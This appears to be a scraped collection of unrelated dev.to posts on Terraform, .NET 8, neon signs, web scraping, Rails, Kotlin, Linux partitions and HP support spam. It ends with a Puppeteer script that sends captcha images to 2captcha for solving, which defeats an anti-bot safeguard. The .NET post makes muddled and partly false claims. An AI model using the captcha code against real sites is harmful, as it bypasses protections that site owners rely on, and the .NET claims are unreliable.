> Notice how we are re-using `local.locations` to create the regional resources.
>
> No one can call our service yet though, because we need to tell GCP that this is a public service that can be invoked by everyone:
```
data "google_iam_policy" "noauth" {
binding {
role = "roles/run.invoker"
members = ["allUsers"]
}
}
resource "google_cloud_run_service_iam_policy" "noauth" {
for_each = toset(local.locations)
service = google_cloud_run_service.service[each.key].name
location = google_cloud_run_service.service[each.key].location
policy_data = data.google_iam_policy.noauth.policy_data
}
```
## Deploy and call the service
Let’s add an output for the static IP address so we know what to call after deployment:
```
output "static_ip" {
value = google_compute_global_address.ip.address
}
```
Now run `terraform apply` to deploy everything and validate that it returns the “Hello World” container (for example using `curl $(terraform output --raw static_ip)`).
The Google Cloud Console also gives a nice visual overview of how the requests are routed:

Now you know how to deploy Google Cloud Run services in multiple regions. Give it a try with [PrivateBin](https://xebia.com/blog/how-to-deploy-privatebin-on-google-cloud-run-and-google-cloud-storage/)!
## Bonus: enable Cloud CDN for even faster loading times
To prevent static assets from being served from your container, you can enable Cloud CDN to automatically serve these from Cloud Storage edge locations instead of the container itself.
Cloud CDN will automatically detect which routes are static resources, but you can manually override this configuration as well.
Simply add the `enable_cnd` flag to the backend service resource:
```
resource "google_compute_backend_service" "backend" {
name = "backend"
protocol = "HTTP"
enable_cdn = true
...
}
```
## Conclusion
By default, a single Cloud Run service can only be deployed in one region.
By using a global load balancer, we can deploy a Cloud Run service in multiple regions to bring high availability and low latency.
The `for_each` loop feature of Terraform makes this very easy to set up.
The post [A minimal setup for a high availability service using Cloud Run](https://xebia.com/blog/a-minimal-setup-for-a-high-availability-service-using-cloud-run/) appeared first on [Xebia](https://xebia.com). | christerbeke |
1,640,646 | What's new in .NET 8? - New Features Unveiled | DOT NET is a prominent platform for custom software development chosen mostly by large-scale IT... | 0 | 2023-10-20T08:19:34 | https://www.ifourtechnolab.com/blog/what-s-new-in-net-8-new-features-unveiled | dotnet, webdev, programming, tutorial | DOT NET is a prominent platform for [custom software development](https://www.ifourtechnolab.com/custom-software-development-company) chosen mostly by large-scale IT giants. According to statistics, there are more than 307,590 developers working in the United States, and the number is growing every day. These figures effectively shed light on the .NET framework's excellent future possibilities.
Microsoft has launched various versions, the finest of which is .NET Core. It includes various improvements over earlier versions and the [major distinction between .NET MVC and .NET Core](https://www.ifourtechnolab.com/blog/differences-between-asp-net-and-asp-net-core-asp-net-vs-asp-net-core)
DOTNET 8 is the latest version released in November 2023. It has been designated as an LTS version and will continue to receive community support and bug fixes for at least three years. This blog will delve into the new features and improvements in .NET 8.
However, it's important to note that performance improvements in .NET 8 are not limited to the areas mentioned here. The .NET team is working continuously on optimizing frameworks, tools, and performance ensuring that developers can build scalable applications across multiple platforms.
#### Unleash your business potential with [Angular development solutions](https://www.ifourtechnolab.com/angular-js-development-company).
## What are the performance improvements introduced in .NET 8?
In .NET 8, several performance improvements have been introduced that enhance application responsiveness and speed, to provide seamless user experience. Here's a look at some of the new features in .NET 8.
- Enhanced route constraints offer improved performance.
- New API development analyzers handle synchronization exceptions in Blazor.
- Context hot reload in Web Assembly enables support for .NET instance fields, properties, and events.
- Symbol servers now support .NET Web Assembly debugging.
- Blazor Firefox experimental Webcil format facilitates debugging of .NET assemblies and Web Assembly.
- Specify the initial Blazor WebView URL for loading.
- Maintain the operation of the SPA development server with a new choice.
- Kestrel now supports named pipes.
- gRPC supports HTTP/2 over TLS (HTTPS) on macOS with HTTP/3 enabled by default, eliminating the need for annotations and http.proto for JSON transcoding.proto.
- Utilize the HubConnectionBuilder IP Network to specify server timeout and stay alive interval parameters.
- Config support was added for parsing HTTP PORTS and HTTPS PORTS.
- Notify users when certain HTTP protocols are not being used.
These improvements aim to optimize various aspects of the .NET ecosystem, allowing applications to perform better and deliver a smoother user experience.
#### Read More: [4 Proven tactics to hire .NET developers for your Business startup](https://www.ifourtechnolab.com/blog/4-proven-tactics-to-hire-net-developers-for-your-business-startup)

## New features of .NET 8
.NET 8 brings new capabilities that not only boost website performance but also responsiveness in order to provide visitors with a more seamless user experience.
Let's explore some of the key performance enhancements in .NET 8:
### 1. JIT Compiler Enhancements
Generating machine code has made it easier to improve runtime execution using the JIT compiler (Just-in-Time). This will help with reduced overhead, improved runtime, and responsiveness to the application.
### 2. Garbage Collection Improvements
The garbage collection mechanism, memory management for allocation and deallocation, has endured enhancements in .NET 8. These improvements will benefit with:
- Reduced memory fragmentation
- Optimized garbage collection algorithms
- Better memory utilization
- Overall performance
### 3. Hardware Intrinsic Support
.NET 8 introduces enhanced support for hardware intrinsic, which are low-level instructions that can directly utilize specific processor features.
By leveraging hardware intrinsic, developers can write high-performance code that takes advantage of specialized CPU instructions, resulting in significant performance gains for compute-intensive operations.
#### Looking to [hire .NET developer](https://www.ifourtechnolab.com/hire-dot-net-developer) for your project?
### 4. Async Improvements
Asynchronous programming has seen significant advancements with the release of DOTNET 8. As a core aspect of any modern app development, the async/await pattern will significantly improve the application's speed and responsiveness.

### 5. Improved Caching Mechanisms
The new MemoryCache class, which enables fast in-memory caching for frequently requested data, is one of the new caching techniques introduced in.NET 8. These caching enhancements can reduce data retrieval and processing overhead dramatically, resulting in enhanced application performance.
### 6. Support for cloud-native applications
Support for cloud-native integration through the use of modern technologies has made an important contribution to .NET 8. It will enable developers to create unique and scalable software that takes full advantage of cloud technology.
- Containerization support
- Serverless computing
- Kubernetes integration
- Cloud storage and messaging integration
- Distributed tracing and monitoring
- Cloud-native tooling
- Infrastructure as Code (IaC) integration
#### Read More: [Best Practices to hire Java developers for Business software development](https://www.ifourtechnolab.com/blog/best-practices-to-hire-java-developers-for-business-software-development)
### 6. Support for cloud-native applications
.NET 8 provides improved performance profiling and diagnostic tools, empowering developers to identify and resolve performance bottlenecks more effectively. These tools offer insights into application behavior, resource consumption, and execution paths, enabling developers to optimize critical sections of their code and improve overall performance.
The entire process of upgrading to .NET 8 was made easier with the help of new tooling. Look at the following image, which depicts the migration stages for .NET 8.

So, leveraging all of these performance improvements in .NET 8, developers can create applications that are more responsive, utilize system resources more efficiently, and provide a smoother user experience, ultimately benefiting both the end users and the organizations that rely on these applications.
### Routing equipment improvements in DOTNET 8
In .NET 8, the routing capabilities have been further improved, empowering developers to build robust and efficient web applications. The enhancements in the routing equipment component of .NET 8 bring benefits not only to developers but also to end-users, ensuring smooth navigation and accessibility.
### Enhanced Routing Performance
In .NET 8, the route equipment has undergone optimizations to improve routing performance. These optimizations help ensure that requests are processed swiftly, enabling web applications to handle a larger volume of traffic efficiently. This improvement is crucial in humanitarian scenarios where timely access to critical resources and information is of utmost importance.
### Localization and Internationalization Support
.NET 8 offers enhanced support for localization and internationalization in routing. This means that developers can easily define routes specific to different languages or regions, allowing applications to adapt to the cultural and linguistic preferences of users. In humanitarian scenarios, where applications often serve a diverse user base, localization support helps bridge language barriers and ensures that crucial information reaches individuals in their preferred language.
### Flexible Routing Configuration
.NET 8 offers more flexibility in configuring routes, making it easier for developers to define and manage complex routing scenarios. This flexibility allows humanitarian organizations to build applications that cater to various user needs, including different languages, regions, or specific user roles. With improved routing configuration, developers can create personalized experiences and provide targeted information to different user segments.
### Secure Routing Infrastructure
Security is a paramount concern in any application, especially when dealing with sensitive humanitarian data. In .NET 8, the routing equipment has been fortified with enhanced security features to protect against common web vulnerabilities, such as cross-site scripting (XSS) and cross-site request forgery (CSRF). These security improvements help safeguard critical data, ensuring the privacy and integrity of humanitarian information.
#### Read More: [Leverage the power of .NET security in Hospitality business software](https://www.ifourtechnolab.com/blog/leverage-the-power-of-net-security-in-hospitality-business-software)
### Route Resilience and Fault Tolerance
The route equipment in .NET 8 has been strengthened to handle fault tolerance and resilience. In humanitarian contexts, where the availability of services and information is vital, these improvements ensure that applications can recover gracefully from failures or unexpected disruptions. With enhanced resilience, organizations can maintain critical services and deliver uninterrupted support to individuals in need.
Using these .NET 8 Routing enhancements, you can design apps that are more responsive resulting in a better user experience.
## Conclusion
With remarkable changes, the arrival of DOT NET 8 has brought about a significant transformation in web development. We reviewed the [major features of .NET](https://www.ifourtechnolab.com/blog/brief-introduction-of-net-5-for-asp-net-developers) 8 in this blog, but it is essential to remember that performance gains in DOTNET 8 are not restricted to the areas described above. The .NET team is constantly optimizing the runtime, frameworks, and tools to ensure that developers can design high-performance applications in a variety of circumstances.
| ifourtechnolab |
1,643,980 | 15 Reasons to Use Custom Neon Signs to Decorate Your Gaming Room | Setting up equipment is only one aspect of designing the optimal gaming space; you also need to... | 0 | 2023-10-23T19:01:57 | https://dev.to/hammadtanveer100/15-reasons-to-use-custom-neon-signs-to-decorate-your-gaming-room-4jnb | Setting up equipment is only one aspect of designing the optimal gaming space; you also need to create an environment that captures your enthusiasm for gaming. In this endeavor, Custom Neon Signs have come to light as an eye-catching method of transforming your gaming room into a world of excitement and individuality. These brilliant pieces of art present a singular chance to give your gaming setup personality and allure.
It's worth the effort to turn your gaming room from a boring room into an exciting world. A captivating way to add your personality, enthusiasm, and sense of design to your gaming setup is with Custom Neon Signs. Custom Neon Signs provide limitless opportunities to make your gaming space genuinely distinctive, whether you're showcasing your gaming identity, including ambient lighting, or adding interactive aspects. So, when you start your creative project, think about the allure of Custom Neon Signs and observe how they fill your gaming area with a dazzling glow that reflects your excitement for gaming.
In this post, we'll explore original ways to use [Custom Neon Signs](https://www.kingsignsmiami.com/) as decorations in your gaming area to make it a genuinely one-of-a-kind haven.

## 1. Gamer's Paradise Entrance:
Make a spectacular entrance rather than merely entering. With Custom Neon Signs placed next to the doorway, you can warmly welcome guests and yourself into your gaming haven. This first impression sets the tone for the entire space, whether it's a straightforward "Welcome to the Gaming Zone" or a quote from your favorite game.
## 2. Showcase Your Gaming Identity:
Customization is important. Create Custom Neon Signs that represent your gaming persona. It might be a representation of one of your favorite games, a badge representing your skill at gaming, or even your glowing gamer tag. This not only gives it a more personalized touch, but it also honors your individual gaming journey.
## 3. Customized Game Corner:
Customization is important. Create Custom Neon Signs that represent your gaming persona. It might be a representation of one of your favorite games, a badge representing your skill at gaming, or even your glowing gamer tag. This not only gives it a more personalized touch, but it also honors your individual gaming journey.
## 4. Highlight Gaming Consoles:
Give the attention that your game consoles require. Custom Neon Signs should be placed precisely above your consoles to produce an eye-catching focal point. The illumination enhances your gaming setup's style while also drawing attention to it.
## 5. Glowing Wall Art:
Add a little artistic flair to improve the beauty of your space. Hang personalized neon signs on the wall to turn it into a glowing work of art. The interaction of light and color provides a captivating aspect that improves the ambiance of your gaming area overall.
## 6. Accentuate Themes:
Accept your preferred video game themes. Design Custom Neon Signs that fit these themes if you enjoy classic arcade games or magical fantasy settings. You may enhance the thematic appeal of your gaming room by including this signage in your design.
## 7. Add Ambient Lighting:
For prolonged gaming sessions, appropriate illumination is essential. The ideal quantity of ambient illumination is provided by custom neon signage, which fosters a welcoming ambiance. The gentle illumination lessens eye fatigue and improves your entire game experience.
## 8. Behind-the-Screen Glow:
Installing Custom Neon Signs behind your TV or gaming monitor will improve your visual experience. The soft glow not only gives a touch of visual appeal but also develops a rich atmosphere that enhances your gaming experience.
## 9. Interactive Wall:
Add an interactive component to your gaming space. Choose a Custom Neon Sign with dynamic colour or pattern changes. Your gaming setup is made even more exciting and engaging by this interactive element.
## 10. Nameplate for Gear:
Improve the look of your gaming accessories. Make personalized neon signs to use as nameplates for your headset, mouse, keyboard, and other devices. This useful yet fashionable accessory gives your system a distinctive flair.
## 11. Streamer's Dream:
A Custom Neon Sign with your streaming name or logo can act as a standout backdrop for individuals who enjoy game streaming. It not only improves your streaming atmosphere, but it also helps your audience recognize your setup right away.
## 12. Gamer's Motivation:
Encouragement quotes can help you play better. Include Custom Neon Signs with messages that inspire you during intense gaming sessions. These reminders help you stay motivated and committed to overcoming obstacles.
## 13. Ceiling Art:
Be imaginative in how you arrange your decor. Hang personalized neon signs from the ceiling to give the impression that they are floating. Your gaming room gains dimension and a dash of fun from its odd placement.
## 14. Create a Contrast:
Try out different visual contrasts. A Custom Neon Sign provides a stunning contrast that not only sticks out but also improves the overall aesthetic of the space if your game room has dark walls.
## 15. Gaming Wall Collage:
Combine several Custom Neon Signs to create a stunning gaming wall collage. Each symbol can reflect many facets of your gaming experience, resulting in a display that is both meaningful and gorgeous to look at.
The addition of Custom Neon Signs to your gaming area is a game-changing decision that comes with a wealth of enticing benefits. These radiant installations go beyond simple aesthetics, acting as catalysts for an enhanced gaming experience, as demonstrated by the 15 reasons listed. Custom Neon Signs have a charm that goes beyond their aesthetic appeal. They not only add vibrant colors and shapes, but they also serve as a blank canvas on which you can paint your individual preferences and interests. Because of its adaptability, you can display your favorite video games, characters, or phrases, effectively transforming your gaming area into an expression of your personality.
| hammadtanveer100 | |
1,644,835 | Game "Black_Jack" in Python | The game "Black_Jack" is one of the game projects on the "Codecademy" course "Computer Science". I... | 0 | 2023-10-24T15:07:20 | https://dev.to/nikola71/game-blackjack-in-python-4o20 | The game "Black_Jack" is one of the game projects on the "Codecademy" course "Computer Science". I enclosed that game project on my GitHub account "https://github.com/NikolaPopovic71". | nikola71 | |
1,658,014 | JavaScript topics for learning react | Learning React in 2023 requires a solid understanding of various JavaScript concepts, as React is a... | 0 | 2023-11-06T07:23:51 | https://dev.to/rowsanali/javascript-topics-for-learning-react-2ao6 | webdev, javascript, react, beginners | Learning React in 2023 requires a solid understanding of various JavaScript concepts, as React is a JavaScript framework for building user interfaces. Here are some of the essential JavaScript topics you should be comfortable with before diving into React:
[Follow me on X](https://bit.ly/3SinH8E)
1. **Callback Functions**: These are functions executed after another function has completed. They're prevalent in JavaScript for handling asynchronous operations, such as events, timers, and after fetching data.
2. **Promises**: To avoid "Callback Hell," which is the nesting of callback functions, promises are used. They allow for writing asynchronous code in a more manageable way and are essential for operations where you expect a future value, such as HTTP requests.
3. **Array Methods**: Understanding methods like `map()`, `filter()`, and `find()` is crucial. `map()` is particularly important in React for rendering lists of elements and can return a new array without altering the size of the original array.
4. **Destructuring**: This is a concise way to extract multiple properties from arrays or objects by unpacking them into distinct variables, which is frequently used in React for props and state management.
5. **Rest and Spread Operators**: These are versatile operators denoted by `...` and are used for several purposes like combining arrays, objects, or extracting their values.
6. **ES2015 Features**: Since React builds on modern JavaScript features introduced with ES2015 (also known as ES6), familiarity with these new syntaxes and capabilities is imperative.
Each of these JavaScript concepts is a foundational block for learning React effectively and will help you understand the more advanced features of the framework as you progress. Moreover, diving into React with a strong grasp of JavaScript will make the learning curve much smoother and enable you to write more robust, maintainable, and efficient code. | rowsanali |
1,658,198 | GPT-4 Vs Zephyr 7b Beta: Which One Should You Use? 2023 | "zephyr 7b beta" is a fine-tuned version of the mode"Mistral" developed by the Hugging Face H4 team... | 0 | 2023-11-06T11:03:22 | https://dev.to/tarikkaoutar/gpt-4-vs-zephyr-7b-beta-which-one-should-you-use-2023-4n7c | gpt4, langchain, llamaindex, datascience | "zephyr 7b beta" is a fine-tuned version of the mode"Mistral" developed by the Hugging Face H4 team that performs similarly to the previous Chat Llama 70B model in multiple benchmark tests and even better results in "MT Bench''. and is more accurate than Meta's LLama 2
Full Article on My [HomePage](https://quickaitutorial.com/gpt-4-vs-zephyr-7b-beta-which-one-should-you-use/) | tarikkaoutar |
1,658,224 | Efficient HP Device Support: Resolving Printer, ToucHPad, and Laptop Keyboard Issues Hassle-Free | In the ever-evolving world of technology, having reliable support for your devices is crucial. When... | 0 | 2023-11-06T11:33:15 | https://dev.to/contactphonenumber/efficient-hp-device-support-resolving-printer-touchpad-and-laptop-keyboard-issues-hassle-free-1pe8 | In the ever-evolving world of technology, having reliable support for your devices is crucial. When it comes to <a href="https://www.contact-phone-number.com/hp-support/">HP printers support</a>, our dedicated team of professionals is committed to providing top-notch solutions for all your printer-related concerns. But printers are not the only devices we specialize in. We understand the frustration that arises when your <a href="https://www.contact-phone-number.com/fix-HP-toucHPad-not-working-error/">toucHPad</a> stops working unexpectedly. Our technicians are well-equipped to diagnose and fix the issue promptly, ensuring you can get back to your tasks without any interruptions. Additionally, if you're facing problems with a <a href="https://www.contact-phone-number.com/troubleshoot-HP-laptop-keyboard-locked-issue/">HP laptop keyboard locked</a> situation, worry not. Our experts can <a href="https://www.contact-phone-number.com/troubleshoot-HP-laptop-keyboard-locked-issue/">troubleshoot</a> the problem efficiently, allowing you to regain control of your device. With our reliable support services, you can experience the smooth functioning of your HP devices, making your tech experience hassle-free. | contactphonenumber | |
1,658,327 | Unlocking the World of International Job Listings: A Node.js and Puppeteer Web Scraping Project🚀 | Introduction Job hunting can be a daunting task, especially with countless job platforms... | 0 | 2023-11-06T13:32:17 | https://dev.to/dcerverizzo/unlocking-the-world-of-international-job-listings-a-nodejs-and-puppeteer-web-scraping-project-297m | node, puppeteer, scraper, beginners | ---
title:Unlocking the World of International Job Listings: A Node.js and Puppeteer Web Scraping Project🚀
published: true
description:
tags: #nodejs #puppeteer #scraper #beginner
cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/6l67d1gk58r68qtfq4k1.png
---
## Introduction
Job hunting can be a daunting task, especially with countless job platforms offering excellent opportunities. Faced with this challenge, I decided to streamline my job search by consolidating the most frequently visited websites into a single, accessible resource.
But how did I go about it? My solution was to create a web scraper using cutting-edge technologies such as Puppeteer, Node.js, and MongoDB. This blog post takes you on a journey through the structure and development of this simple yet powerful project.
## The Quest Begins
The first step in my mission to simplify the job search process was to leverage web scraping. Web scraping allowed me to extract data from multiple job websites, collate it, and present it in a user-friendly format.
For this, I chose Puppeteer, a headless Chrome browser, and Node.js, a powerful JavaScript runtime. These technologies worked in tandem to retrieve job listings and relevant details. With the data collected, I stored it efficiently using MongoDB, a document-based NoSQL database.
## The Building Blocks
To commence my project, I initiated the process of creating a web scraper using Puppeteer. This technology granted me access to web pages, from where I could extract crucial job listing data.
Node.js played a vital role in orchestrating this process. By utilizing JavaScript, I could craft functions to navigate web pages, retrieve job descriptions, and compile the data into structured information.
## Storing Data for Easy Access
MongoDB, known for its flexibility in handling unstructured data, proved invaluable. It served as the perfect repository for the job listings gathered from web scraping.
The NoSQL database stored each job listing as a document, making it easier to organize, retrieve, and display the data in a user-friendly manner.
## Project structure
The project's root directory is where all your project files and subdirectories reside.
## `src/`
The `src/` directory contains the source code of your project.
- `scripts/`: This directory houses the core logic of your web scraping and database operations.
- `scraper.js`: The main script for web scraping using Puppeteer and Node.js.
- `database.js`: Script for handling MongoDB database operations.
- `server.js`: Your main Node.js application file to serve the scraped data to a frontend.
## `models/`
The `models/` directory contains the data models, schemas, or structures for your project.
- `jobSchema.js`: Defines the schema for job listings to be stored in your MongoDB database.
## `utils/`
The `utils/` directory contains utility files, configurations, and other miscellaneous scripts.
- `sites.js`: A configuration file listing the websites to scrape, including selectors for job details.
- `config.js`: Configuration settings for your database connection.
## `node_modules/`
This directory contains the Node.js modules and packages that your project depends on. You don't need to manage this directory manually.
## `.gitignore`
The `.gitignore` file specifies which files or directories should be ignored when you push your project to a version control system like Git. Commonly, it includes the `node_modules/` directory.
## `package.json`
The `package.json` file lists project metadata and dependencies. It's also where you specify your project's main entry point and various scripts.
## `README.md`
The README file provides essential information about your project, including how to set it up, run it, and any other necessary documentation.
This structured approach keeps your project organized, making it easier to manage and collaborate with others. The main logic for web scraping and database operations is separated, ensuring a clean and maintainable codebase. You can customize this structure based on your specific project needs.
## Code
### The Scraper Class
Our scraper will be encapsulated in a class for modularity and maintainability. Here's what it looks like:
```javascript
// Import necessary modules and configuration
const puppeteer = require('puppeteer');
const sites = require('../utils/sites');
const database = require('../utils/config');
class Scraper {
async scrapeData(site) {
// Create a headless Chromium browser using Puppeteer
const browser = await puppeteer.launch();
const page = await browser.newPage();
try {
// Navigate to the specified website
await page.goto(site.url, { timeout: 600000 });
// Select all job listings on the page using a provided selector
const jobList = await page.$$(`${site.selectors.list}`);
const jobData = [];
// Loop through the job listings and extract relevant information
for (const job of jobList) {
const title = await job.$eval(`${site.selectors.title}`, (element) => element.textContent.trim());
const company = await job.$eval(`${site.selectors.company}`, (element) => element.textContent.trim());
const location = await job.$eval(`${site.selectors.location}`, (element) => element.textContent.trim());
const link = await job.$eval(`${site.selectors.link}`, (element) => element.href);
jobData.push({ title, company, location, link });
}
return jobData;
} finally {
// Close the browser after scraping is complete
await browser.close();
}
}
async init() {
try {
// Connect to the MongoDB database
await database.connect();
// Clear existing data in the database
await database.clearData();
// Scrape data from multiple sites and store it in MongoDB
const scrapedData = await Promise.all(sites.map((site) => this.scrapeData(site)));
// Save scraped data to MongoDB
await database.saveDataToMongoDB(scrapedData);
} catch (error) {
console.error('Error in app:', error);
} finally {
console.log('Finish!');
}
}
}
module.exports = Scraper;
```
```javascript
// Configuration for websites to scrape
const sites = [
{
name: 'Remotive',
url: 'https://remotive.com/remote-jobs/software-dev',
selectors: {
list: 'li.tw-cursor-pointer',
title: 'a.tw-block > span',
company: 'span.tw-block',
location: 'span.job-tile-location',
link: 'a.tw-block',
},
},
];
module.exports = sites;
```
## Conclusion
The fusion of Puppeteer, Node.js, and MongoDB created a comprehensive solution to simplify job searches. With this project, I centralized data from various websites, making it easier for jobseekers to access the most relevant listings. By sharing this experience, I hope to inspire others to embark on similar projects, harnessing the power of web scraping and innovative technologies. The journey to streamline your job search begins here!
You can access this project online here:
https://jobs-one-drab.vercel.app/
https://github.com/Dcerverizzo/web-scraping-jobs | dcerverizzo |
1,658,374 | # Setting up Impression Tracking with Rails using the Impressionist Gem | Impression tracking is a valuable feature for many web applications as it allows you to keep a count... | 0 | 2023-11-06T13:24:12 | https://dev.to/bhartee_sahare/-setting-up-impression-tracking-with-rails-using-the-impressionist-gem-53oc | Impression tracking is a valuable feature for many web applications as it allows you to keep a count of how many times a specific resource, like a post or a page, has been viewed. In this blog post, we will walk through the process of setting up impression tracking in a Ruby on Rails application using the Impressionist gem.
### Step 1: Creating a New Rails Application
To get started, let's create a new Rails application. You can do this with the following commands:
```bash
rails new impressionist_1_gem
cd impressionist_1_gem
```
### Step 2: Creating the Question Model
In our example, let's assume that we want to track impressions on a `Question` model. We'll create a `Question` model and set up the necessary associations:
```bash
rails generate model Question title content:text
rake db:migrate
```
### Step 3: Adding the Impressionist Gem
Now, let's add the Impressionist gem to your Rails application. Include it in your `Gemfile` and run the following commands:
```ruby
gem 'impressionist'
bundle install
```
```bash
bundle install
rails generate impressionist
rails db:migrate
```
### Step 4: Setting Up the Impressionist Table
The Impressionist gem generates a migration to create an `impressions` table. Here's an example of what the migration might look like:
```ruby
class CreateImpressionsTable < ActiveRecord::Migration[7.0]
def self.up
create_table :impressions, :force => true do |t|
t.string :impressionable_type
t.integer :impressionable_id
t.integer :user_id
t.string :controller_name
t.string :action_name
t.string :view_name
t.string :request_hash
t.string :ip_address
t.string :session_hash
t.text :message
t.text :referrer
t.text :params
t.timestamps
end
# Add necessary indexes
end
def self.down
drop_table :impressions
end
end
```
### Step 5: Making the Question Model "Impressionable"
In your `Question` model, you need to make it "impressionable" by adding the `is_impressionable` method:
```ruby
# app/models/question.rb
class Question < ApplicationRecord
is_impressionable
# ...
end
```
### Step 6: Using Impression Tracking in the Questions Controller
In your `QuestionsController`, you can use Impressionist to track impressions on specific actions. For example, to track impressions on the `show` and `index` actions:
```ruby
# app/controllers/questions_controller.rb
class QuestionsController < ApplicationController
impressionist :actions => [:show, :index]
# ...
end
```
### Step 7: Displaying Impression Counts
To display the impression counts in your view, you can use the `impressionist_count` method provided by the Impressionist gem:
```erb
<h1>All Questions</h1>
<table>
<thead>
<tr>
<th>Id</th>
<th>Title</th>
<th>Content</th>
<th>Views</th>
<th colspan="3">Actions</th>
</tr>
</thead>
<tbody>
<% @questions.each do |question| %>
<tr>
<td><%= question.id %></td>
<td><%= question.title %></td>
<td><%= question.content %></td>
<td><%= question.impressionist_count %></td>
<td>
<%= link_to 'Show', question_path(question.id) %> |
<%= link_to 'Destroy', question_path(question.id), method: :delete %> |
<%= link_to 'Edit', edit_question_path(question.id) %>
</td>
</tr>
<% end %>
</tbody>
</table>
```
---
This blog post provides a step-by-step guide on setting up impression tracking in a Ruby on Rails application using the Impressionist gem. It covers the installation of necessary gems, creating models, and configuring impression tracking. With this setup, you can keep track of views on specific resources in your application.
| bhartee_sahare | |
1,669,013 | Project Euler #4 - Two-Headed Monster | Project Euler Series This is a 4th post of ongoing series based on Project Euler. You can check out... | 0 | 2023-11-16T19:57:33 | https://dev.to/fangcode/project-euler-4-two-headed-monster-a56 | kotlin, projecteuler, programming, beginners | > **Project Euler Series**
>
> This is a 4th post of ongoing series based on [Project Euler](https://projecteuler.net/).
> You can check out the previous post [here](https://dev.to/fangcode/project-euler-3-to-sieve-or-not-to-sieve-29f0).
>
> **Disclaimer**
>
> This blogpost provides solution to the 4th problem from Project Euler.
> If you want to figure out a solution yourself, go to the [Problem 4's page](https://projecteuler.net/problem=4) and come back later 😌
This time we have another very popular problem to solve. A palindrome, but with a nice twist. Usually, it's about strings and this one is about numbers.
It's going to be a short one, so let's get to it 😇
> **The Problem**
>
>A palindromic number reads the same both ways. The largest palindrome made from the product of two 2-digit numbers is {% katex inline %}9009 = 91 * 99{% endkatex %}.
>
>Find the largest palindrome made from the product of two 3-digit numbers.
## Am I a Palindrome?
Classic, simple algorithmic problem to solve. Is something the same when read from the beginning to the end as when read from the end to the beginning. As you can imagine, checking an integer is as simple as checking a single word 🤓
1. We need to change the input into a string.
2. When the input has an even length, then we simply divide it into two parts, otherwise we take the biggest even half from both sides.
3. If the left side is the same as reversed right side, **we have a palindrome**!
### Show Me The Code!
Ok, ok, here you go 😇
```kotlin
fun isPalindromeNumber(value: Int): Boolean {
val valueInString = value.toString()
val valueSize = valueInString.length
val comparisonCellLength = valueSize / 2
val leftSide = valueInString.subSequence(
startIndex = 0,
endIndex = comparisonCellLength,
)
val rightSide = valueInString.subSequence(
startIndex = valueSize - comparisonCellLength,
endIndex = valueSize,
).reversed().toString()
return leftSide == rightSide
}
```
Super simple ❤️
## Glue Everything Together
In order to get the solution we need to use the `isPalindromeNumber` for every product of two numbers from {% katex inline %}100{% endkatex %} to {% katex inline %}999{% endkatex %}. Additionally, just out of curiosity, we can get an information how many palindromes has a given configuration.
```kotlin
fun getPalindromes(): List<Int> {
val bottom = 100
val top = 999
val palindromes = mutableListOf<Int>()
for (i in top downTo bottom) {
for (j in top downTo bottom) {
val result = i * j
if (isPalindromeNumber(result)) {
palindromes.add(result)
}
}
}
return palindromes
}
// Print the solution
println(getLargestPalindrome().maxOrNull())
```
## The Solution
The answer to the problem is: `906609` and there are `2470` palindromes within the given setup.
## Conclusion
Yet another classic problem to solve, however with a nice twist. That concludes the 4th problem. Nothing more interesting to share here. Just remember the set is created from a product of two numbers and not it's not a range from {% katex inline %}100 * 100{% endkatex %} to {% katex inline %}999 * 999{% endkatex %}. | fangcode |
1,658,437 | Resizing Your Installed Linux Partition: A Step-by-Step Guide | Resizing your Linux partition can be a bit tricky, especially for new users, especially when you're... | 0 | 2023-11-06T14:46:12 | https://dev.to/deri_kurniawan/how-to-resize-your-linux-partition-p63 | linux, tutorial, beginners | Resizing your Linux partition can be a bit tricky, especially for new users, especially when you're using a dual-boot setup. To make it clear and concise, here's an updated step-by-step guide using Ubuntu as an example.
Please note that if you're not using Ubuntu, the specific Linux distribution mentioned in this guide (Ubuntu) should be replaced with the name of the Linux distribution you have installed, such as Kali, Fedora, or any other distribution.
**Note:** Always back up your important data before attempting any disk partition changes.
**Step 1:** Insert your bootable Ubuntu USB.

**Step 2:** Start or restart your computer and access the boot menu. The key to access the boot menu varies depending on your computer's manufacturer, but it's often something like F12 or F2. Consult your computer's documentation or perform an online search to find the correct key for your machine.
**Step 3:** Select "Try Ubuntu without installing" from the boot menu. If you can't find this option, choose "Install Ubuntu" instead. After selecting "Install Ubuntu," you'll be directed to the installation menu, where you should then see the "Try Ubuntu without installing" option.

**Step 4:** Once you're in the live Ubuntu environment, open GParted.
**Step 5:** In GParted, locate your Ubuntu partition (usually identified as ext4 or a similar filesystem), and carefully resize it to create more space. Ensure that you leave enough space for Ubuntu to function correctly; if in doubt, consult with a knowledgeable friend or online resources to determine the optimal size.
That's it! You've successfully resized your Ubuntu partition. After this, you can proceed with the installation or other tasks as needed. Remember to always back up your data and proceed with caution when resizing partitions to avoid data loss. | deri_kurniawan |
1,658,667 | How to automate an image-based captcha solution in JavaScript | This article describes how to automate image-based captcha solving in JavaScript using Puppeteer and... | 0 | 2023-11-06T18:18:27 | https://dev.to/dzmitry/how-to-automate-an-image-based-captcha-solution-in-javascript-5925 | javascript, captcha, 2captcha, puppeteer | This article describes how to automate image-based captcha solving in JavaScript using [Puppeteer](https://pptr.dev/) and the [2captcha](https://2captcha.com/) service. [Puppeteer](https://pptr.dev/) is a Node.js library used for automation. [2captcha](https://2captcha.com/) is a service used to solve captchas. To interact with the [2captcha](https://2captcha.com/) service, the [2captcha-ts](https://www.npmjs.com/package/2captcha-ts) library is used.
## Algorithm of actions:
1. Open the page in Puppeteer and save the captcha image
2. Sending the captcha to the service
3. We get the answer to the captcha
4. We use the received answer on the page
### Step #1 - Open the page in Puppeteer and save the captcha image
For example, let’s open a demo page with a captcha image and save the captcha image:
```js
// Open page
await page.goto("https://2captcha.com/demo/normal");
await page.waitForSelector('img[alt="normal captcha example"]');
const element = await page.$('img[alt="normal captcha example"]');
// Save captcha
await element.screenshot({ path: "./image_captcha.png" });
```
### Step #2 - Sending the captcha to the service
```js
const getCaptchaAnswer = async () => {
try {
const base64Captcha = fs.readFileSync("./image_captcha.png", "base64");
// Sending captcha to 2captcha.com service
const res = await solver.imageCaptcha({
body: base64Captcha,
});
return res.data;
} catch (err) {
console.log(err);
}
};
```
### Step #3 - We get the answer to the captcha
```js
const captchaAnswer = await getCaptchaAnswer();
console.log("captchaAnswer:" + captchaAnswer);
```
### Step #4 -We use the received answer on the page
```js
// Typing the received answer into the answer field
